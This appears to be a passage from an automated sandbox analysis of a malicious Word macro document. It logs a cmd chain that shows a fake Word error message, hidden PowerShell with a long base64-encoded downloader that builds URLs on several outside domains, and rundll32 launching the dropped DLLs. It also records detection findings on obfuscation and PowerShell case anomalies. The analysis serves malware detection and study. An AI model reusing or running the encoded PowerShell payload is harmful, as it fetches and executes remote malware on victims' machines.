BzAGcAewAnACsAJwAwAH0AJwArACcAUwBqAF8AZAB3AGcAcwB7ACcAKwAnADAAfQAnACkAIAAgAC0AZgAgAFsAQwBIAEEAUgBdADkAMgApACkAOwAkAFQANAA4AEsAPQAoACcASAAnACsAKAAnADYAMQAnACsAJwBEACcAKQApADsAIAAgACQAVwBpADgAOgA6ACIAcwBlAGMAdQBSAGkAdABgAHkAcAByAE8AYABUAGAAbwBjAG8ATAAiACAAPQAgACgAKAAnAFQAbAAnACsAJwBzACcAKQArACcAMQAyACcAKQA7ACQAQwA1ADkATQA9ACgAKAAnAE0AJwArACcAMgA0ACcAKQArACcAUAAnACkAOwAkAFgAbQBtAGgAawBlAGQAIAA9ACAAKAAoACcAUgAnACsAJwAzADEAJwApACsAJwBOACcAKQA7ACQAQQA2ADkASQA9ACgAKAAnAFAAXwAnACsAJwA2ACcAKQArACcAQgAnACkAOwAkAFEAMgB5AGcAOQBnAF8APQAkAEgATwBNAEUAKwAoACgAKAAnADEAJwArACcAdwByACcAKQArACgAJwBOAHMAJwArACcAcAB6ACcAKQArACgAJwB2ACcAKwAnAHMAZwAnACkAKwAnADEAdwAnACsAKAAnAHIAUwAnACsAJwBqAF8AJwArACcAZAB3ACcAKwAnAGcAcwAxAHcAcgAnACkAKQAuACIAcgBFAHAAYABsAEEAYwBlACIAKAAoAFsAQwBoAGEAcgBdADQAOQArAFsAQwBoAGEAcgBdADEAMQA5ACsAWwBDAGgAYQByAF0AMQAxADQAKQAsACcAXAAnACkAKQArACQAWABtAG0AaABrAGUAZAArACgAKAAnAC4AZAAnACsAJwBsACcAKQArACcAbAAnACkAOwAkAFUAMwA5AFIAPQAoACcATQAwACcAKwAnADEAUAAnACkAOwAkAFEAYwBlAGMAaAA0AGgAPQAoACcAXQBhACcAKwAoACcAbgAnACsAJwB3AFsAMwA6AC8ALwAnACkAKwAoACcAdwAnACsAJwBwAHMAJwApACsAJwBhACcAKwAnAHAAawAnACsAKAAnAC4AYwBvACcAKwAnAG0ALwB3AHAALQAnACsAJwBhAGQAJwArACcAbQBpACcAKQArACgAJwBuAC8AdgAnACsAJwAvAEAAJwApACsAJwBdACcAKwAoACcAYQBuAHcAJwArACcAWwAzACcAKwAnADoALwAvAHMAJwApACsAKAAnAG8AZgBzAHUAJwArACcAaQAnACkAKwAnAHQAZQAnACsAKAAnAC4AYwAnACsAJwBvACcAKQArACcAbQAvACcAKwAnAHcAcAAnACsAKAAnAC0AaQAnACsAJwBuAGMAJwApACsAKAAnAGwAdQBkACcAKwAnAGUAJwApACsAJwBzAC8AJwArACgAJwAyAGoAbQAzAG4AJwArACcASQBrAC8AJwArACcAQAAnACkAKwAoACcAXQBhACcAKwAnAG4AdwBbACcAKQArACcAMwAnACsAKAAnADoALwAvAHYAZQB0AGUAcgAnACsAJwBpAG4AYQByAGkAYQAnACsAJwBkACcAKQArACgAJwByAHAAJwArACcAbwBwACcAKQArACgAJwB1AGkALgBjAG8AJwArACcAbQAnACkAKwAoACcALwAnACsAJwBjAG8AJwApACsAJwBuACcAKwAnAHQA
Source: unknown Process created: C:\Windows\System32\msg.exe msg user /v Word experienced an error trying to open the file.
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD IABzAFYAIAAgACgAIgBLACIAKwAiADQANwBkACIAKQAgACAAKABbAHQAWQBQAGUAXQAoACIAewA0AH0AewAxAH0AewAwAH0AewAzAH0AewAyAH0AIgAtAEYAJwBzACcALAAnAHkAJwAsACcAZQBjAFQAbwByAFkAJwAsACcAVABFAG0ALgBJAG8ALgBEAEkAcgAnACwAJwBzACcAKQApACAAIAA7ACAAIAAgACAAJABXAGkAOAAgAD0AWwB0AHkAUABlAF0AKAAiAHsAMgB9AHsAMwB9AHsANwB9AHsAMQB9AHsANAB9AHsANgB9AHsANQB9AHsAOAB9AHsAMAB9ACIALQBGACAAJwBnAEUAUgAnACwAJwAuAE4AZQB0AC4AUwBFAFIAVgAnACwAJwBTAFkAcwAnACwAJwBUAGUAJwAsACcASQAnACwAJwB0AG0AQQAnACwAJwBDAGUAUABPAEkATgAnACwAJwBtACcALAAnAE4AYQAnACkAIAA7ACAAJABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAoACgAJwBTAGkAbABlAG4AdAAnACsAJwBsAHkAJwApACsAJwBDACcAKwAoACcAbwBuACcAKwAnAHQAaQAnACkAKwAnAG4AJwArACcAdQBlACcAKQA7ACQATwBsADkAbwBuAGsAaQA9ACQAQwAwADIAVwAgACsAIABbAGMAaABhAHIAXQAoADYANAApACAAKwAgACQAQQAwADMAUAA7ACQASAAyADcAWAA9ACgAJwBJACcAKwAoACcANgAnACsAJwA3AFEAJwApACkAOwAgACAAKABnAGkAIAAoACIAVgBhAFIAIgArACIAaQBBAEIATABlADoAawAiACsAIgA0ADcAZAAiACkAIAAgACkALgB2AGEATAB1AGUAOgA6ACIAQwByAEUAYABBAGAAVABgAEUARABJAFIAZQBDAFQAYABPAFIAeQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAnAHsAJwArACcAMAAnACsAJwB9AE4AcwAnACsAJwBwACcAKwAnAHoAdgBzAGcAewAnACsAJwAwAH0AJwArACcAUwBqAF8AZAB3AGcAcwB7ACcAKwAnADAAfQAnACkAIAAgAC0AZgAgAFsAQwBIAEEAUgBdADkAMgApACkAOwAkAFQANAA4AEsAPQAoACcASAAnACsAKAAnADYAMQAnACsAJwBEACcAKQApADsAIAAgACQAVwBpADgAOgA6ACIAcwBlAGMAdQBSAGkAdABgAHkAcAByAE8AYABUAGAAbwBjAG8ATAAiACAAPQAgACgAKAAnAFQAbAAnACsAJwBzACcAKQArACcAMQAyACcAKQA7ACQAQwA1ADkATQA9ACgAKAAnAE0AJwArACcAMgA0ACcAKQArACcAUAAnACkAOwAkAFgAbQBtAGgAawBlAGQAIAA9ACAAKAAoACcAUgAnACsAJwAzADEAJwApACsAJwBOACcAKQA7ACQAQQA2ADkASQA9ACgAKAAnAFAAXwAnACsAJwA2ACcAKQArACcAQgAnACkAOwAkAFEAMgB5AGcAOQBnAF8APQAkAEgATwBNAEUAKwAoACgAKAAnADEAJwArACcAdwByACcAKQArACgAJwBOAHMAJwArACcAcAB6ACcAKQArACgAJwB2ACcAKwAnAHMAZwAnACkAKwAnADEAdwAnACsAKAAnAHIAUwAnACsAJwBqAF8AJwArACcAZAB3ACcAKwAnAGcAcwAxAHcAcgAnACkAKQAuACIAcgBFAHAAYABsAEEAYwBlACIAKAAoAFsAQwBoAGEAcgBdADQAOQArAFsAQwBoAGEAcgBdADEAMQA5ACsAWwBDAGgAYQByAF0AMQAxADQAKQAsACcAXAAnACkAKQArACQAWABtAG0AaABrAGUAZAArACgAKAAnAC4AZAAnACsAJwBsACcAKQArACcAbAAnACkAOwAkAFUAMwA5AFIAPQAoACcATQAwACcAKwAnADEAUAAnACkAOwAkAFEAYwBlAGMAaAA0AGgAPQAoACcAXQBhACcAKwAoACcAbgAnACsAJwB3AFsAMwA6AC8ALwAnACkAKwAoACcAdwAnACsAJwBwAHMAJwApACsAJwBhACcAKwAnAHAAawAnACsAKAAnAC4AYwBvACcAKwAnAG0ALwB3AHAALQAnACsAJwBhAGQAJwArACcAbQBpACcAKQArACgAJwBuAC8AdgAnACsAJwAvAEAAJwApACsAJwBdACcAKwAoACcAYQBuAHcAJwArACcAWwAzACcAKwAnADoALwAvAHMAJwApACsAKAAnAG8AZgBzAHUAJwArACcAaQAnACkAKwAnAHQAZQAnACsAKAAnAC4AYwAnACsAJwBvACcAKQArACcAbQAvACcAKwAnAHcAcAAnACsAKAAnAC0AaQAnACsAJwBuAGMAJwApACsAKAAnAGwAdQBkACcAKwAnAGUAJwApACsAJwBzAC8AJwArACgAJwAyAGoAbQAzAG4AJwArACcASQBrAC8AJwArACcAQAAnACkAKwAoACcAXQBhACcAKwAnAG4AdwBbACcAKQArACcAMwAnACsAKAAnADoALwAvAHYAZQB0AGUAcgAnACsAJwBpAG4AYQByAGkAYQAnACsAJwBkACcAKQArACgAJwByAHAAJwArACcAbwBwACcAKQArACgAJwB1AGkALgBjAG8AJwArACcAbQAnACkAKwAoACcALwAnACsAJwBjAG8AJwApACsAJwBuACcAKwAnAHQAZQAnACsAKAAnAG4AdAAnACsAJwAvADUAZgAnACkAKwAnADEAJwArACcAOABRACcAK
Source: unknown Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Nspzvsg\Sj_dwgs\R31N.dll Control_RunDLL
Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Nspzvsg\Sj_dwgs\R31N.dll Control_RunDLL
Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Gpnlsmsow\geunbjvu.dkg',Control_RunDLL
Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Mjwjtkxgnh\wyssufqxr.vub',Control_RunDLL
Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Iiasa\gdao.xuk',Control_RunDLL
Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Kjucifzppxjqp\brxqhmcbxcls.kkx',Control_RunDLL
Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Chaxbancxgzy\rbmbxmqpfdk.tvd',Control_RunDLL
Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Umbfypagzceb\sgdrbhhkrdu.ucy',Control_RunDLL
Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Pegimmebijdsrjpt\trbcflzgrjlwmib.jho',Control_RunDLL
Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Pqftsc\netes.ucb',Control_RunDLL
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\msg.exe msg user /v Word experienced an error trying to open the file. Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD IABzAFYAIAAgACgAIgBLACIAKwAiADQANwBkACIAKQAgACAAKABbAHQAWQBQAGUAXQAoACIAewA0AH0AewAxAH0AewAwAH0AewAzAH0AewAyAH0AIgAtAEYAJwBzACcALAAnAHkAJwAsACcAZQBjAFQAbwByAFkAJwAsACcAVABFAG0ALgBJAG8ALgBEAEkAcgAnACwAJwBzACcAKQApACAAIAA7ACAAIAAgACAAJABXAGkAOAAgAD0AWwB0AHkAUABlAF0AKAAiAHsAMgB9AHsAMwB9AHsANwB9AHsAMQB9AHsANAB9AHsANgB9AHsANQB9AHsAOAB9AHsAMAB9ACIALQBGACAAJwBnAEUAUgAnACwAJwAuAE4AZQB0AC4AUwBFAFIAVgAnACwAJwBTAFkAcwAnACwAJwBUAGUAJwAsACcASQAnACwAJwB0AG0AQQAnACwAJwBDAGUAUABPAEkATgAnACwAJwBtACcALAAnAE4AYQAnACkAIAA7ACAAJABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAoACgAJwBTAGkAbABlAG4AdAAnACsAJwBsAHkAJwApACsAJwBDACcAKwAoACcAbwBuACcAKwAnAHQAaQAnACkAKwAnAG4AJwArACcAdQBlACcAKQA7ACQATwBsADkAbwBuAGsAaQA9ACQAQwAwADIAVwAgACsAIABbAGMAaABhAHIAXQAoADYANAApACAAKwAgACQAQQAwADMAUAA7ACQASAAyADcAWAA9ACgAJwBJACcAKwAoACcANgAnACsAJwA3AFEAJwApACkAOwAgACAAKABnAGkAIAAoACIAVgBhAFIAIgArACIAaQBBAEIATABlADoAawAiACsAIgA0ADcAZAAiACkAIAAgACkALgB2AGEATAB1AGUAOgA6ACIAQwByAEUAYABBAGAAVABgAEUARABJAFIAZQBDAFQAYABPAFIAeQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAnAHsAJwArACcAMAAnACsAJwB9AE4AcwAnACsAJwBwACcAKwAnAHoAdgBzAGcAewAnACsAJwAwAH0AJwArACcAUwBqAF8AZAB3AGcAcwB7ACcAKwAnADAAfQAnACkAIAAgAC0AZgAgAFsAQwBIAEEAUgBdADkAMgApACkAOwAkAFQANAA4AEsAPQAoACcASAAnACsAKAAnADYAMQAnACsAJwBEACcAKQApADsAIAAgACQAVwBpADgAOgA6ACIAcwBlAGMAdQBSAGkAdABgAHkAcAByAE8AYABUAGAAbwBjAG8ATAAiACAAPQAgACgAKAAnAFQAbAAnACsAJwBzACcAKQArACcAMQAyACcAKQA7ACQAQwA1ADkATQA9ACgAKAAnAE0AJwArACcAMgA0ACcAKQArACcAUAAnACkAOwAkAFgAbQBtAGgAawBlAGQAIAA9ACAAKAAoACcAUgAnACsAJwAzADEAJwApACsAJwBOACcAKQA7ACQAQQA2ADkASQA9ACgAKAAnAFAAXwAnACsAJwA2ACcAKQArACcAQgAnACkAOwAkAFEAMgB5AGcAOQBnAF8APQAkAEgATwBNAEUAKwAoACgAKAAnADEAJwArACcAdwByACcAKQArACgAJwBOAHMAJwArACcAcAB6ACcAKQArACgAJwB2ACcAKwAnAHMAZwAnACkAKwAnADEAdwAnACsAKAAnAHIAUwAnACsAJwBqAF8AJwArACcAZAB3ACcAKwAnAGcAcwAxAHcAcgAnACkAKQAuACIAcgBFAHAAYABsAEEAYwBlACIAKAAoAFsAQwBoAGEAcgBdADQAOQArAFsAQwBoAGEAcgBdADEAMQA5ACsAWwBDAGgAYQByAF0AMQAxADQAKQAsACcAXAAnACkAKQArACQAWABtAG0AaABrAGUAZAArACgAKAAnAC4AZAAnACsAJwBsACcAKQArACcAbAAnACkAOwAkAFUAMwA5AFIAPQAoACcATQAwACcAKwAnADEAUAAnACkAOwAkAFEAYwBlAGMAaAA0AGgAPQAoACcAXQBhACcAKwAoACcAbgAnACsAJwB3AFsAMwA6AC8ALwAnACkAKwAoACcAdwAnACsAJwBwAHMAJwApACsAJwBhACcAKwAnAHAAawAnACsAKAAnAC4AYwBvACcAKwAnAG0ALwB3AHAALQAnACsAJwBhAGQAJwArACcAbQBpACcAKQArACgAJwBuAC8AdgAnACsAJwAvAEAAJwApACsAJwBdACcAKwAoACcAYQBuAHcAJwArACcAWwAzACcAKwAnADoALwAvAHMAJwApACsAKAAnAG8AZgBzAHUAJwArACcAaQAnACkAKwAnAHQAZQAnACsAKAAnAC4AYwAnACsAJwBvACcAKQArACcAbQAvACcAKwAnAHcAcAAnACsAKAAnAC0AaQAnACsAJwBuAGMAJwApACsAKAAnAGwAdQBkACcAKwAnAGUAJwApACsAJwBzAC8AJwArACgAJwAyAGoAbQAzAG4AJwArACcASQBrAC8AJwArACcAQAAnACkAKwAoACcAXQBhACcAKwAnAG4AdwBbACcAKQArACcAMwAnACsAKAAnADoALwAvAHYAZQB0AGUAcgAnACsAJwBpAG4AYQByAGkAYQAnACsAJwBkACcAKQArACgAJwByAHAAJwArACcAbwBwACcAKQArACgAJwB1AGkALgBjAG8AJwArACcAbQAnACkAKwAoACcALwAnACsAJwBjAG8AJwApACsAJwBuACcAKwAnAHQAZQAnACsAKAAnAG4AdAAnACsAJwAvADUAZgAnACkAKwAnADEAJwArACcAOABRACcAK Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Nspzvsg\Sj_dwgs\R31N.dll Control_RunDLL Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Nspzvsg\Sj_dwgs\R31N.dll Control_RunDLL Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Gpnlsmsow\geunbjvu.dkg',Control_RunDLL Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Mjwjtkxgnh\wyssufqxr.vub',Control_RunDLL Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Iiasa\gdao.xuk',Control_RunDLL Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Kjucifzppxjqp\brxqhmcbxcls.kkx',Control_RunDLL Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Chaxbancxgzy\rbmbxmqpfdk.tvd',Control_RunDLL Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Umbfypagzceb\sgdrbhhkrdu.ucy',Control_RunDLL Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Pegimmebijdsrjpt\trbcflzgrjlwmib.jho',Control_RunDLL Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Pqftsc\netes.ucb',Control_RunDLL Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\InProcServer32 Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorrc.dll Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior
Source: Binary string: C:\Windows\symbols\dll\System.pdbom source: powershell.exe, 00000005.00000002.2107672322.0000000001C37000.00000004.00000040.sdmp
Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2107672322.0000000001C37000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdbCom source: powershell.exe, 00000005.00000002.2107672322.0000000001C37000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\dll\System.Management.Automation.pdbProg source: powershell.exe, 00000005.00000002.2107672322.0000000001C37000.00000004.00000040.sdmp
Source: Binary string: ws\System.pdbpdbtem.pdb\a source: powershell.exe, 00000005.00000002.2107672322.0000000001C37000.00000004.00000040.sdmp
Source: Binary string: E:\WindowsSDK7-Samples-master\WindowsSDK7-Samples-master\winui\shell\appshellintegration\RecipePropertyHandler\Win32\Release\RecipePropertyHandler.pdb source: rundll32.exe, 00000007.00000002.2115635529.000000001000D000.00000002.00020000.sdmp
Source: Binary string: System.pdb* source: powershell.exe, 00000005.00000002.2107672322.0000000001C37000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2107672322.0000000001C37000.00000004.00000040.sdmp
Source: Binary string: ws\System.Management.Automation.pdbpdbion.pdbERSP source: powershell.exe, 00000005.00000002.2107672322.0000000001C37000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\System.pdbon.dll source: powershell.exe, 00000005.00000002.2107672322.0000000001C37000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2107672322.0000000001C37000.00000004.00000040.sdmp
Source: Binary string: System.pdb source: powershell.exe, 00000005.00000002.2107672322.0000000001C37000.00000004.00000040.sdmp
Source: Binary string: System.pdb8 source: powershell.exe, 00000005.00000002.2107672322.0000000001C37000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\System.pdb source: powershell.exe, 00000005.00000002.2107672322.0000000001C37000.00000004.00000040.sdmp
Source: Binary string: mscorrc.pdb source: powershell.exe, 00000005.00000002.2107818605.0000000001E80000.00000002.00000001.sdmp
Source: Binary string: <ystem.pdb source: powershell.exe, 00000005.00000002.2107672322.0000000001C37000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\dll\System.pdb5\ source: powershell.exe, 00000005.00000002.2107672322.0000000001C37000.00000004.00000040.sdmp
Source: DATA-480841.doc Initial sample: OLE summary subject = lime payment B2B responsive Practical solid state copy compelling

Data Obfuscation:

barindex
Document contains an embedded VBA with many GOTO operations indicating source code obfuscation
Source: DATA-480841.doc Stream path 'Macros/VBA/Owppnp8hah4xo788' : High number of GOTO operations
Source: VBA code instrumentation OLE, VBA macro, High number of GOTO operations: Module Owppnp8hah4xo788 Name: Owppnp8hah4xo788
Obfuscated command line found
Source: unknown Process created: C:\Windows\System32\cmd.exe cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & P^Ow^er^she^L^L -w hidden -ENCOD IABzAFYAIAAgACgAIgBLACIAKwAiADQANwBkACIAKQAgACAAKABbAHQAWQBQAGUAXQAoACIAewA0AH0AewAxAH0AewAwAH0AewAzAH0AewAyAH0AIgAtAEYAJwBzACcALAAnAHkAJwAsACcAZQBjAFQAbwByAFkAJwAsACcAVABFAG0ALgBJAG8ALgBEAEkAcgAnACwAJwBzACcAKQApACAAIAA7ACAAIAAgACAAJABXAGkAOAAgAD0AWwB0AHkAUABlAF0AKAAiAHsAMgB9AHsAMwB9AHsANwB9AHsAMQB9AHsANAB9AHsANgB9AHsANQB9AHsAOAB9AHsAMAB9ACIALQBGACAAJwBnAEUAUgAnACwAJwAuAE4AZQB0AC4AUwBFAFIAVgAnACwAJwBTAFkAcwAnACwAJwBUAGUAJwAsACcASQAnACwAJwB0AG0AQQAnACwAJwBDAGUAUABPAEkATgAnACwAJwBtACcALAAnAE4AYQAnACkAIAA7ACAAJABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAoACgAJwBTAGkAbABlAG4AdAAnACsAJwBsAHkAJwApACsAJwBDACcAKwAoACcAbwBuACcAKwAnAHQAaQAnACkAKwAnAG4AJwArACcAdQBlACcAKQA7ACQATwBsADkAbwBuAGsAaQA9ACQAQwAwADIAVwAgACsAIABbAGMAaABhAHIAXQAoADYANAApACAAKwAgACQAQQAwADMAUAA7ACQASAAyADcAWAA9ACgAJwBJACcAKwAoACcANgAnACsAJwA3AFEAJwApACkAOwAgACAAKABnAGkAIAAoACIAVgBhAFIAIgArACIAaQBBAEIATABlADoAawAiACsAIgA0ADcAZAAiACkAIAAgACkALgB2AGEATAB1AGUAOgA6ACIAQwByAEUAYABBAGAAVABgAEUARABJAFIAZQBDAFQAYABPAFIAeQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAnAHsAJwArACcAMAAnACsAJwB9AE4AcwAnACsAJwBwACcAKwAnAHoAdgBzAGcAewAnACsAJwAwAH0AJwArACcAUwBqAF8AZAB3AGcAcwB7ACcAKwAnADAAfQAnACkAIAAgAC0AZgAgAFsAQwBIAEEAUgBdADkAMgApACkAOwAkAFQANAA4AEsAPQAoACcASAAnACsAKAAnADYAMQAnACsAJwBEACcAKQApADsAIAAgACQAVwBpADgAOgA6ACIAcwBlAGMAdQBSAGkAdABgAHkAcAByAE8AYABUAGAAbwBjAG8ATAAiACAAPQAgACgAKAAnAFQAbAAnACsAJwBzACcAKQArACcAMQAyACcAKQA7ACQAQwA1ADkATQA9ACgAKAAnAE0AJwArACcAMgA0ACcAKQArACcAUAAnACkAOwAkAFgAbQBtAGgAawBlAGQAIAA9ACAAKAAoACcAUgAnACsAJwAzADEAJwApACsAJwBOACcAKQA7ACQAQQA2ADkASQA9ACgAKAAnAFAAXwAnACsAJwA2ACcAKQArACcAQgAnACkAOwAkAFEAMgB5AGcAOQBnAF8APQAkAEgATwBNAEUAKwAoACgAKAAnADEAJwArACcAdwByACcAKQArACgAJwBOAHMAJwArACcAcAB6ACcAKQArACgAJwB2ACcAKwAnAHMAZwAnACkAKwAnADEAdwAnACsAKAAnAHIAUwAnACsAJwBqAF8AJwArACcAZAB3ACcAKwAnAGcAcwAxAHcAcgAnACkAKQAuACIAcgBFAHAAYABsAEEAYwBlACIAKAAoAFsAQwBoAGEAcgBdADQAOQArAFsAQwBoAGEAcgBdADEAMQA5ACsAWwBDAGgAYQByAF0AMQAxADQAKQAsACcAXAAnACkAKQArACQAWABtAG0AaABrAGUAZAArACgAKAAnAC4AZAAnACsAJwBsACcAKQArACcAbAAnACkAOwAkAFUAMwA5AFIAPQAoACcATQAwACcAKwAnADEAUAAnACkAOwAkAFEAYwBlAGMAaAA0AGgAPQAoACcAXQBhACcAKwAoACcAbgAnACsAJwB3AFsAMwA6AC8ALwAnACkAKwAoACcAdwAnACsAJwBwAHMAJwApACsAJwBhACcAKwAnAHAAawAnACsAKAAnAC4AYwBvACcAKwAnAG0ALwB3AHAALQAnACsAJwBhAGQAJwArACcAbQBpACcAKQArACgAJwBuAC8AdgAnACsAJwAvAEAAJwApACsAJwBdACcAKwAoACcAYQBuAHcAJwArACcAWwAzACcAKwAnADoALwAvAHMAJwApACsAKAAnAG8AZgBzAHUAJwArACcAaQAnACkAKwAnAHQAZQAnACsAKAAnAC4AYwAnACsAJwBvACcAKQArACcAbQAvACcAKwAnAHcAcAAnACsAKAAnAC0AaQAnACsAJwBuAGMAJwApACsAKAAnAGwAdQBkACcAKwAnAGUAJwApACsAJwBzAC8AJwArACgAJwAyAGoAbQAzAG4AJwArACcASQBrAC8AJwArACcAQAAnACkAKwAoACcAXQBhACcAKwAnAG4AdwBbACcAKQArACcAMwAnACsAKAAnADoALwAvAHYAZQB0AGUAcgAnACsAJwBpAG4AYQByAGkAYQAnACsAJwBkACcAKQArACgAJwByAHAAJwArACcAbwBwACcAKQArACgAJwB1AGkALgBjAG8AJwArACcAbQAnACkAKwAoACcALwAnACsAJwBjAG8AJwApACsAJwBuACcAKwAnAHQA
PowerShell case anomaly found
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD IABzAFYAIAAgACgAIgBLACIAKwAiADQANwBkACIAKQAgACAAKABbAHQAWQBQAGUAXQAoACIAewA0AH0AewAxAH0AewAwAH0AewAzAH0AewAyAH0AIgAtAEYAJwBzACcALAAnAHkAJwAsACcAZQBjAFQAbwByAFkAJwAsACcAVABFAG0ALgBJAG8ALgBEAEkAcgAnACwAJwBzACcAKQApACAAIAA7ACAAIAAgACAAJABXAGkAOAAgAD0AWwB0AHkAUABlAF0AKAAiAHsAMgB9AHsAMwB9AHsANwB9AHsAMQB9AHsANAB9AHsANgB9AHsANQB9AHsAOAB9AHsAMAB9ACIALQBGACAAJwBnAEUAUgAnACwAJwAuAE4AZQB0AC4AUwBFAFIAVgAnACwAJwBTAFkAcwAnACwAJwBUAGUAJwAsACcASQAnACwAJwB0AG0AQQAnACwAJwBDAGUAUABPAEkATgAnACwAJwBtACcALAAnAE4AYQAnACkAIAA7ACAAJABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAoACgAJwBTAGkAbABlAG4AdAAnACsAJwBsAHkAJwApACsAJwBDACcAKwAoACcAbwBuACcAKwAnAHQAaQAnACkAKwAnAG4AJwArACcAdQBlACcAKQA7ACQATwBsADkAbwBuAGsAaQA9ACQAQwAwADIAVwAgACsAIABbAGMAaABhAHIAXQAoADYANAApACAAKwAgACQAQQAwADMAUAA7ACQASAAyADcAWAA9ACgAJwBJACcAKwAoACcANgAnACsAJwA3AFEAJwApACkAOwAgACAAKABnAGkAIAAoACIAVgBhAFIAIgArACIAaQBBAEIATABlADoAawAiACsAIgA0ADcAZAAiACkAIAAgACkALgB2AGEATAB1AGUAOgA6ACIAQwByAEUAYABBAGAAVABgAEUARABJAFIAZQBDAFQAYABPAFIAeQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAnAHsAJwArACcAMAAnACsAJwB9AE4AcwAnACsAJwBwACcAKwAnAHoAdgBzAGcAewAnACsAJwAwAH0AJwArACcAUwBqAF8AZAB3AGcAcwB7ACcAKwAnADAAfQAnACkAIAAgAC0AZgAgAFsAQwBIAEEAUgBdADkAMgApACkAOwAkAFQANAA4AEsAPQAoACcASAAnACsAKAAnADYAMQAnACsAJwBEACcAKQApADsAIAAgACQAVwBpA